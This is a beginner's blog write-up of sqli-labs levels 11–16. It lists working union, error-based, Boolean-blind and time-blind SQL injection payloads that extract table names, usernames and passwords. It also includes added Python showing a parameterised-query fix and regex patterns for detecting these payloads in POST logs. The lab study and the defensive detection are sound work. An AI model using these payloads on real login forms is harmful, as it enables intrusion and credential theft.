Beginner SQL injection learning: sqli-labs Less 11-16 learning record

Less11: POST-based single-quote string injection

1. POST-based injection
Less11 submits its parameters to the back end with POST. POST submission is somewhat safer because the parameters are not in the URL and so are not saved in the browser history.
With POST injection the parameter is passed through the input box and is still carried into the database query.
2. Finding the injection point
There are two parameters here, username and password, and both are sent to the database.
Enter ' in the username box with any password (for example 123): the database errors, and the error message shows that the single quote in the input closed the quote around username. If the rest of the statement is commented out with # and the database no longer errors, the username field is an injection point.
Enter '# in the username box with any password: the database does not error and the page displays normally, so the username parameter is confirmed as the injection point.
3. union injection
(1) order by to find the number of columns

' order by 3 #  database error: the third column does not exist
' order by 2 #  no error, the page is normal, so there are two columns

(2) Find the display positions

' union select 1,2 #  the page echoes 1 in the username position and 2 in the password position.

(3) Query the database name

' union select database(),version() #  position 1 shows the database name, position 2 the database version.

(4) Query the table names

' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

(5) Query the column names of the users table

' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

(6) Query the column contents

' union select 1,group_concat(username,0x7e,password) from users#

Less12: POST-based string injection, double-quote variant

1. Determining the injection point
Enter a backslash \ in the username box to make the database error. The error message shows that the username value is wrapped as ("username"), so the injection needs ") to close both the double quote and the parenthesis.

Enter ") in the username box with any password: the database errors and the error page is shown.
Enter ")# in the username box with any password: the page displays normally, so the injection point is confirmed.
2. union injection
The procedure is the same as Less11 above; just replace ' with ") in the payloads to complete the injection.

Less13: POST-based error injection, single quote with parentheses

1. Finding the injection point
Again use a backslash \ to make the database error. The error shows that username and password are wrapped as (''), so ') is needed to close them.

2. extractvalue() error-based injection
(1) order by shows there are 2 columns
') order by 2 #  no error
(2) With ') union select 1,2 # the page only shows that the login succeeded, without echoing the login data, so echo-based (union) injection cannot display anything. Therefore consider error-based injection.
(3) Error-based query of the database name; the payloads are attached below

') and extractvalue(1,concat(0x7e,database(),0x7e))#

Query table name

') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))#

Users query column name

') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))#

Query username

') and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))#

Queries password

') and extractvalue(1,concat(0x7e,(select password from users limit 0,1),0x7e))#
Injection complete.

Less14: POST-based error injection, double-quote variant

Same method as Less13: a backslash \ makes the database error and shows that the parameter is wrapped in double quotes "", then use extractvalue() to complete the injection.
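Why the backslash probe errors on all four wrappers of Less11 to Less14, and how a parameterised query removes the whole class of problem, as an added example written for this record (not the lab's own PHP). The query templates are my reconstruction of the wrappers the error messages reveal, the quote scanner is a simplified model of MySQL string lexing, and the users row is constructed:

```python
import sqlite3

# Reconstructed shape of the sqli-labs login queries (an assumption drawn from
# the wrappers the backslash probe reveals in Less 11-14, not the lab's PHP).
WRAPPERS = {
    11: "SELECT username,password FROM users WHERE username='{u}' AND password='{p}' LIMIT 0,1",
    12: 'SELECT username,password FROM users WHERE username=("{u}") AND password=("{p}") LIMIT 0,1',
    13: "SELECT username,password FROM users WHERE username=('{u}') AND password=('{p}') LIMIT 0,1",
    14: 'SELECT username,password FROM users WHERE username="{u}" AND password="{p}" LIMIT 0,1',
}

def vulnerable_login_sql(level, username, password):
    """String concatenation: raw POST values become part of the SQL text."""
    return WRAPPERS[level].format(u=username, p=password)

def balanced_quotes(sql):
    """Simplified MySQL string lexing: backslash escapes the next character
    inside a string, # starts a line comment. False means a syntax error."""
    quote, i = None, 0
    while i < len(sql):
        c = sql[i]
        if quote is None:
            if c == "#":          # rest of the line is a comment
                break
            if c in "'\"":
                quote = c
        elif c == "\\":           # \' or \" does not close the string
            i += 1
        elif c == quote:
            quote = None
        i += 1
    return quote is None

def safe_login(conn, username, password):
    """Parameterised query: values travel separately from the SQL text, so
    quotes, backslashes and # in the input never change the statement."""
    cur = conn.execute(
        "SELECT username,password FROM users WHERE username=? AND password=? LIMIT 1",
        (username, password))
    return cur.fetchone()  # the lab stores plaintext; real code compares a hash

def demo_db():
    """Constructed in-memory users table (the lab's first account is Dumb/Dumb)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users(username,password) VALUES ('Dumb','Dumb')")
    return conn
```

The scanner reports an unterminated string for a lone \ or ' on every wrapper, which is the error the walkthrough reads the wrapper from, while the parameterised version returns no row and no error for the same input.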

Less15: POST-based Boolean blind injection

1. Determining the injection type
Whatever is entered, the database gives no error, so error-based injection cannot be used; consider blind injection.
Entering ' union select 1,2 # in the username box with any password logs in successfully, which shows that
1. the parameter is wrapped in single quotes, and 2. a correct statement logs in successfully while a wrong one fails. This is typical Boolean blind injection.

2. left() Boolean blind: put the payload in the username box; because everything after # is commented out, the password can be anything.
(1) Determine the length of the database name
-1' and length(database())=8 #
(2) Guess the database name
admin' and left(database(),1)='s'#
If the first letter of the database name is s the login succeeds, otherwise it fails.
Continue in the same way, comparing one more character each time, until the whole name is found; the database name turns out to be security.
(3) Table names, column names, and contents are guessed the same way; blind injection is tedious, so only part of the payloads are attached

Table name
admin' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e'#
Column name
admin' and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i'#
Field content
admin' and left((select username from users limit 0,1),1)='D'#

(4) Burp Suite can also be used to brute force the characters; refer to the Less8 Boolean blind notes.

Less16: POST-based time-based blind injection

1. Boolean blind

Same method as Less15, but in Less16 the parameter is wrapped as (""), so ") is needed to close it. Just change the ' in the payloads to ") to complete the injection.

2. Time-based blind
Entering ") union select 1,2 and sleep(…) in the username box, the page response is noticeably delayed, so time-based blind injection with sleep() can be used.
Part of the payloads are attached

Database name
admin") and if(left(database(),1)='s',sleep(2),0)#
Table name
admin") and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(2),0)#
Column name
admin") and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(2),0)#
username
admin") and if(left((select username from users limit 0,1),1)='D',sleep(2),0)#
password
admin") and if(left((select password from users limit 0,1),1)='D',sleep(2),0)#
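Seen from the defending side, the payloads used across Less11 to Less16 are easy to recognise once the POST body is actually logged (plain access logs keep only the URL, which is exactly why POST felt "safer"). The following is an added example, not part of the original post; it assumes a WAF or application audit log with one "METHOD PATH BODY" line per request and the sqli-labs field names uname and passwd, and the log lines are constructed:

```python
import re
from urllib.parse import parse_qs, urlencode

# One regex per technique used in the Less 11-16 walkthrough. A single payload
# may match several (the Less16 payload is both boolean and time based).
SIGNATURES = {
    "closure+comment": re.compile(r"""['"]\)?\s*(and|or|union|order)\b.*#""", re.I | re.S),
    "union": re.compile(r"\bunion\s+select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "error-based": re.compile(r"\bextractvalue\s*\(", re.I),
    "boolean-blind": re.compile(r"\bleft\s*\(.+\)\s*=\s*'", re.I),
    "time-blind": re.compile(r"\bsleep\s*\(", re.I),
}

def classify_body(body):
    """Decode the form body first (the browser sends # as %23 and ' as %27),
    then match every field value; returns the set of technique names seen."""
    found = set()
    for values in parse_qs(body, keep_blank_values=True).values():
        for value in values:
            found.update(name for name, rx in SIGNATURES.items() if rx.search(value))
    return found

def scan_log(lines):
    """Return (path, sorted techniques) for every POST line that matched."""
    hits = []
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) < 3 or parts[0] != "POST":
            continue
        techniques = classify_body(parts[2])
        if techniques:
            hits.append((parts[1], sorted(techniques)))
    return hits

def make_line(level, uname, passwd="x"):
    """Constructed sample line in the assumed 'METHOD PATH BODY' format."""
    return f"POST /Less-{level}/ " + urlencode({"uname": uname, "passwd": passwd})

# Constructed log: one benign login, then payloads from the sections above.
SAMPLE_LOG = [
    make_line(11, "Dumb", "Dumb"),
    make_line(11, "' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#"),
    make_line(13, "') and extractvalue(1,concat(0x7e,database(),0x7e))#"),
    make_line(15, "admin' and left((select username from users limit 0,1),1)='D'#"),
    make_line(16, "admin\") and if(left(database(),1)='s',sleep(2),0)#"),
]
```

Matching only after form decoding matters: the raw body of the Less11 line contains %27 and %23, not ' and #, so a rule applied to the undecoded line would miss it.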

 

PS: beginner's summary

(1) POST and GET injection methods are basically the same; the main difference is how the parameters are transmitted.

(2) POST parameters are entered by us through the form, so we control them, and they are carried into the database query.

(3) Use the page content, the echoed information, and the error information to decide the injection method. The backslash \ error method is very handy.

Beginner injection learning record!!

Source: www.cnblogs.com/ersuani/p/sqlilab_less11-16.html